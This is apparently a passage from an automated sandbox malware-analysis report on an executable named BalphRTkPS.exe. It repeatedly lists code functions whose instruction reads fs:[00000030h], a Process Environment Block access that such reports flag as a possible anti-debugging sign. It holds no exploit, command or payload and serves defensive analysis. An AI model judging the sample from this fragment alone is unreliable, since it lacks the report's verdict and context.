                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E59C mov eax, dword ptr fs:[00000030h]6_2_0176E59C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01732582 mov eax, dword ptr fs:[00000030h]6_2_01732582
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01732582 mov ecx, dword ptr fs:[00000030h]6_2_01732582
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01764588 mov eax, dword ptr fs:[00000030h]6_2_01764588
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175A470 mov eax, dword ptr fs:[00000030h]6_2_0175A470
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175A470 mov eax, dword ptr fs:[00000030h]6_2_0175A470
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175A470 mov eax, dword ptr fs:[00000030h]6_2_0175A470
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BC460 mov ecx, dword ptr fs:[00000030h]6_2_017BC460
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172645D mov eax, dword ptr fs:[00000030h]6_2_0172645D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175245A mov eax, dword ptr fs:[00000030h]6_2_0175245A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E443 mov eax, dword ptr fs:[00000030h]6_2_0176E443
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E443 mov eax, dword ptr fs:[00000030h]6_2_0176E443
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E443 mov eax, dword ptr fs:[00000030h]6_2_0176E443
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E443 mov eax, dword ptr fs:[00000030h]6_2_0176E443
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E443 mov eax, dword ptr fs:[00000030h]6_2_0176E443
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E443 mov eax, dword ptr fs:[00000030h]6_2_0176E443
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E443 mov eax, dword ptr fs:[00000030h]6_2_0176E443
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E443 mov eax, dword ptr fs:[00000030h]6_2_0176E443
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A430 mov eax, dword ptr fs:[00000030h]6_2_0176A430
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172E420 mov eax, dword ptr fs:[00000030h]6_2_0172E420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172E420 mov eax, dword ptr fs:[00000030h]6_2_0172E420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172E420 mov eax, dword ptr fs:[00000030h]6_2_0172E420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172C427 mov eax, dword ptr fs:[00000030h]6_2_0172C427
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B6420 mov eax, dword ptr fs:[00000030h]6_2_017B6420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B6420 mov eax, dword ptr fs:[00000030h]6_2_017B6420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B6420 mov eax, dword ptr fs:[00000030h]6_2_017B6420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B6420 mov eax, dword ptr fs:[00000030h]6_2_017B6420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B6420 mov eax, dword ptr fs:[00000030h]6_2_017B6420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B6420 mov eax, dword ptr fs:[00000030h]6_2_017B6420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B6420 mov eax, dword ptr fs:[00000030h]6_2_017B6420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01768402 mov eax, dword ptr fs:[00000030h]6_2_01768402
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01768402 mov eax, dword ptr fs:[00000030h]6_2_01768402
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01768402 mov eax, dword ptr fs:[00000030h]6_2_01768402
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017304E5 mov ecx, dword ptr fs:[00000030h]6_2_017304E5
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017644B0 mov ecx, dword ptr fs:[00000030h]6_2_017644B0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BA4B0 mov eax, dword ptr fs:[00000030h]6_2_017BA4B0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017364AB mov eax, dword ptr fs:[00000030h]6_2_017364AB
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01738770 mov eax, dword ptr fs:[00000030h]6_2_01738770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01730750 mov eax, dword ptr fs:[00000030h]6_2_01730750
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BE75D mov eax, dword ptr fs:[00000030h]6_2_017BE75D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772750 mov eax, dword ptr fs:[00000030h]6_2_01772750
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772750 mov eax, dword ptr fs:[00000030h]6_2_01772750
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B4755 mov eax, dword ptr fs:[00000030h]6_2_017B4755
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176674D mov esi, dword ptr fs:[00000030h]6_2_0176674D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176674D mov eax, dword ptr fs:[00000030h]6_2_0176674D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176674D mov eax, dword ptr fs:[00000030h]6_2_0176674D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176273C mov eax, dword ptr fs:[00000030h]6_2_0176273C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176273C mov ecx, dword ptr fs:[00000030h]6_2_0176273C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176273C mov eax, dword ptr fs:[00000030h]6_2_0176273C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AC730 mov eax, dword ptr fs:[00000030h]6_2_017AC730
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176C720 mov eax, dword ptr fs:[00000030h]6_2_0176C720
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176C720 mov eax, dword ptr fs:[00000030h]6_2_0176C720
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01730710 mov eax, dword ptr fs:[00000030h]6_2_01730710
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01760710 mov eax, dword ptr fs:[00000030h]6_2_01760710
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176C700 mov eax, dword ptr fs:[00000030h]6_2_0176C700
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017347FB mov eax, dword ptr fs:[00000030h]6_2_017347FB
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017347FB mov eax, dword ptr fs:[00000030h]6_2_017347FB
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017527ED mov eax, dword ptr fs:[00000030h]6_2_017527ED
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017527ED mov eax, dword ptr fs:[00000030h]6_2_017527ED
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017527ED mov eax, dword ptr fs:[00000030h]6_2_017527ED
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BE7E1 mov eax, dword ptr fs:[00000030h]6_2_017BE7E1
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173C7C0 mov eax, dword ptr fs:[00000030h]6_2_0173C7C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B07C3 mov eax, dword ptr fs:[00000030h]6_2_017B07C3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017307AF mov eax, dword ptr fs:[00000030h]6_2_017307AF
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D678E mov eax, dword ptr fs:[00000030h]6_2_017D678E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01762674 mov eax, dword ptr fs:[00000030h]6_2_01762674
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F866E mov eax, dword ptr fs:[00000030h]6_2_017F866E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F866E mov eax, dword ptr fs:[00000030h]6_2_017F866E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A660 mov eax, dword ptr fs:[00000030h]6_2_0176A660
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A660 mov eax, dword ptr fs:[00000030h]6_2_0176A660
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174C640 mov eax, dword ptr fs:[00000030h]6_2_0174C640
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174E627 mov eax, dword ptr fs:[00000030h]6_2_0174E627
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01766620 mov eax, dword ptr fs:[00000030h]6_2_01766620
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01768620 mov eax, dword ptr fs:[00000030h]6_2_01768620
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173262C mov eax, dword ptr fs:[00000030h]6_2_0173262C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772619 mov eax, dword ptr fs:[00000030h]6_2_01772619
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE609 mov eax, dword ptr fs:[00000030h]6_2_017AE609
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174260B mov eax, dword ptr fs:[00000030h]6_2_0174260B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174260B mov eax, dword ptr fs:[00000030h]6_2_0174260B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174260B mov eax, dword ptr fs:[00000030h]6_2_0174260B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174260B mov eax, dword ptr fs:[00000030h]6_2_0174260B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174260B mov eax, dword ptr fs:[00000030h]6_2_0174260B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174260B mov eax, dword ptr fs:[00000030h]6_2_0174260B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174260B mov eax, dword ptr fs:[00000030h]6_2_0174260B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE6F2 mov eax, dword ptr fs:[00000030h]6_2_017AE6F2
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE6F2 mov eax, dword ptr fs:[00000030h]6_2_017AE6F2
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE6F2 mov eax, dword ptr fs:[00000030h]6_2_017AE6F2
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE6F2 mov eax, dword ptr fs:[00000030h]6_2_017AE6F2
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B06F1 mov eax, dword ptr fs:[00000030h]6_2_017B06F1
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B06F1 mov eax, dword ptr fs:[00000030h]6_2_017B06F1
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A6C7 mov ebx, dword ptr fs:[00000030h]6_2_0176A6C7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A6C7 mov eax, dword ptr fs:[00000030h]6_2_0176A6C7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017666B0 mov eax, dword ptr fs:[00000030h]6_2_017666B0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176C6A6 mov eax, dword ptr fs:[00000030h]6_2_0176C6A6
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01734690 mov eax, dword ptr fs:[00000030h]6_2_01734690
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01734690 mov eax, dword ptr fs:[00000030h]6_2_01734690
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D4978 mov eax, dword ptr fs:[00000030h]6_2_017D4978
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D4978 mov eax, dword ptr fs:[00000030h]6_2_017D4978
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BC97C mov eax, dword ptr fs:[00000030h]6_2_017BC97C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01756962 mov eax, dword ptr fs:[00000030h]6_2_01756962
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01756962 mov eax, dword ptr fs:[00000030h]6_2_01756962
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01756962 mov eax, dword ptr fs:[00000030h]6_2_01756962
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0177096E mov eax, dword ptr fs:[00000030h]6_2_0177096E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0177096E mov edx, dword ptr fs:[00000030h]6_2_0177096E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0177096E mov eax, dword ptr fs:[00000030h]6_2_0177096E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B0946 mov eax, dword ptr fs:[00000030h]6_2_017B0946
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B892A mov eax, dword ptr fs:[00000030h]6_2_017B892A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C892B mov eax, dword ptr fs:[00000030h]6_2_017C892B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BC912 mov eax, dword ptr fs:[00000030h]6_2_017BC912
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01728918 mov eax, dword ptr fs:[00000030h]6_2_01728918
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01728918 mov eax, dword ptr fs:[00000030h]6_2_01728918
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE908 mov eax, dword ptr fs:[00000030h]6_2_017AE908
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE908 mov eax, dword ptr fs:[00000030h]6_2_017AE908
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017629F9 mov eax, dword ptr fs:[00000030h]6_2_017629F9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017629F9 mov eax, dword ptr fs:[00000030h]6_2_017629F9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BE9E0 mov eax, dword ptr fs:[00000030h]6_2_017BE9E0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A9D0 mov eax, dword ptr fs:[00000030h]6_2_0173A9D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A9D0 mov eax, dword ptr fs:[00000030h]6_2_0173A9D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A9D0 mov eax, dword ptr fs:[00000030h]6_2_0173A9D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A9D0 mov eax, dword ptr fs:[00000030h]6_2_0173A9D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A9D0 mov eax, dword ptr fs:[00000030h]6_2_0173A9D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A9D0 mov eax, dword ptr fs:[00000030h]6_2_0173A9D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017649D0 mov eax, dword ptr fs:[00000030h]6_2_017649D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FA9D3 mov eax, dword ptr fs:[00000030h]6_2_017FA9D3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C69C0 mov eax, dword ptr fs:[00000030h]6_2_017C69C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B89B3 mov esi, dword ptr fs:[00000030h]6_2_017B89B3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B89B3 mov eax, dword ptr fs:[00000030h]6_2_017B89B3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B89B3 mov eax, dword ptr fs:[00000030h]6_2_017B89B3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017309AD mov eax, dword ptr fs:[00000030h]6_2_017309AD
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017309AD mov eax, dword ptr fs:[00000030h]6_2_017309AD
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BE872 mov eax, dword ptr fs:[00000030h]6_2_017BE872
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BE872 mov eax, dword ptr fs:[00000030h]6_2_017BE872
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C6870 mov eax, dword ptr fs:[00000030h]6_2_017C6870
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C6870 mov eax, dword ptr fs:[00000030h]6_2_017C6870
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01760854 mov eax, dword ptr fs:[00000030h]6_2_01760854
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01734859 mov eax, dword ptr fs:[00000030h]6_2_01734859
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01734859 mov eax, dword ptr fs:[00000030h]6_2_01734859
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01742840 mov ecx, dword ptr fs:[00000030h]6_2_01742840
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01752835 mov eax, dword ptr fs:[00000030h]6_2_01752835
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01752835 mov eax, dword ptr fs:[00000030h]6_2_01752835
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01752835 mov eax, dword ptr fs:[00000030h]6_2_01752835
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01752835 mov ecx, dword ptr fs:[00000030h]6_2_01752835
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01752835 mov eax, dword ptr fs:[00000030h]6_2_01752835
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01752835 mov eax, dword ptr fs:[00000030h]6_2_01752835
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A830 mov eax, dword ptr fs:[00000030h]6_2_0176A830
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D483A mov eax, dword ptr fs:[00000030h]6_2_017D483A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D483A mov eax, dword ptr fs:[00000030h]6_2_017D483A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BC810 mov eax, dword ptr fs:[00000030h]6_2_017BC810
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176C8F9 mov eax, dword ptr fs:[00000030h]6_2_0176C8F9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176C8F9 mov eax, dword ptr fs:[00000030h]6_2_0176C8F9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FA8E4 mov eax, dword ptr fs:[00000030h]6_2_017FA8E4
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E8C0 mov eax, dword ptr fs:[00000030h]6_2_0175E8C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BC89D mov eax, dword ptr fs:[00000030h]6_2_017BC89D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01730887 mov eax, dword ptr fs:[00000030h]6_2_01730887
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172CB7E mov eax, dword ptr fs:[00000030h]6_2_0172CB7E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C6B40 mov eax, dword ptr fs:[00000030h]6_2_017C6B40
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C6B40 mov eax, dword ptr fs:[00000030h]6_2_017C6B40
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FAB40 mov eax, dword ptr fs:[00000030h]6_2_017FAB40
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D8B42 mov eax, dword ptr fs:[00000030h]6_2_017D8B42
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175EB20 mov eax, dword ptr fs:[00000030h]6_2_0175EB20
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175EB20 mov eax, dword ptr fs:[00000030h]6_2_0175EB20
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F8B28 mov eax, dword ptr fs:[00000030h]6_2_017F8B28
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F8B28 mov eax, dword ptr fs:[00000030h]6_2_017F8B28
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AEB1D mov eax, dword ptr fs:[00000030h]6_2_017AEB1D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AEB1D mov eax, dword ptr fs:[00000030h]6_2_017AEB1D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AEB1D mov eax, dword ptr fs:[00000030h]6_2_017AEB1D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AEB1D mov eax, dword ptr fs:[00000030h]6_2_017AEB1D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AEB1D mov eax, dword ptr fs:[00000030h]6_2_017AEB1D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AEB1D mov eax, dword ptr fs:[00000030h]6_2_017AEB1D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AEB1D mov eax, dword ptr fs:[00000030h]6_2_017AEB1D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AEB1D mov eax, dword ptr fs:[00000030h]6_2_017AEB1D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AEB1D mov eax, dword ptr fs:[00000030h]6_2_017AEB1D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01738BF0 mov eax, dword ptr fs:[00000030h]6_2_01738BF0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01738BF0 mov eax, dword ptr fs:[00000030h]6_2_01738BF0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01738BF0 mov eax, dword ptr fs:[00000030h]6_2_01738BF0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175EBFC mov eax, dword ptr fs:[00000030h]6_2_0175EBFC
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BCBF0 mov eax, dword ptr fs:[00000030h]6_2_017BCBF0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017DEBD0 mov eax, dword ptr fs:[00000030h]6_2_017DEBD0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01750BCB mov eax, dword ptr fs:[00000030h]6_2_01750BCB
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01750BCB mov eax, dword ptr fs:[00000030h]6_2_01750BCB
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01750BCB mov eax, dword ptr fs:[00000030h]6_2_01750BCB
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01730BCD mov eax, dword ptr fs:[00000030h]6_2_01730BCD
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01730BCD mov eax, dword ptr fs:[00000030h]6_2_01730BCD
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01730BCD mov eax, dword ptr fs:[00000030h]6_2_01730BCD
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740BBE mov eax, dword ptr fs:[00000030h]6_2_01740BBE
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740BBE mov eax, dword ptr fs:[00000030h]6_2_01740BBE
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01804A80 mov eax, dword ptr fs:[00000030h]6_2_01804A80
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017ACA72 mov eax, dword ptr fs:[00000030h]6_2_017ACA72
